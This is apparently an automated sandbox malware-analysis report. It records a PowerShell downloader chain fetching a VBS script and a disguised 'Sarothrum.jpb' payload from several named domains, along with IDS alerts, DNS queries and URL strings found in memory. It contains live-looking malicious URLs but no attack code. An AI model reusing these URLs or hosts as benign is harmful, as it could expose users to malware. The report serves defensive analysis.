Source: Joe Sandbox View | ASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 148.251.114.233:443
Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ov/wh.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global traffic | DNS traffic detected: DNS query: www.fornid.com
          Source: global traffic | DNS traffic detected: DNS query: www.pineappletech.ae
          Source: global traffic | DNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global traffic | DNS traffic detected: DNS query: www.almrwad.com
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:38:19 GMT | Server: Apache | P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" | Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyiskbISKkTmQkL1lNdBd32jy%2F4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZBMCBalW%2FAKWOU2%2FeAFzTBk%3D000075; expires=Wed, 25-Dec-2024 09:38:19 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponly | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:38:29 GMT | server: LiteSpeed | alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:38:35 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:38:42 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:38:48 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:38:54 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:38:59 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:05 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:11 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:17 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:23 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:29 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:35 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:41 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:46 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:52 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:58 GMT | server: LiteSpeed
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:04 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:10 GMT | server: LiteSpeed
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://almrwad.comp
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000003.00000002.2219212023.000001DACF81F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mX
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
          Source: powershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901F73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.2327446000.0000023900C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7DBE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.c
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.co
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/w
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/S
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sa
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sar
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Saro
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarot
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Saroth
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothr
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothru
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothrum
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothrum.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothrum.j
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothrum.jp
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1E2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.almrwad.com/wh/Sarothrum.jpb
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.i
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.in
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.inf
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C09F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/w
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/S
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sa
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sar
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Saro
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarot
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Saroth
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothr
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothru
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.j
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.jp
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1E2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.jpb
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/145-maschere-antigas
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro
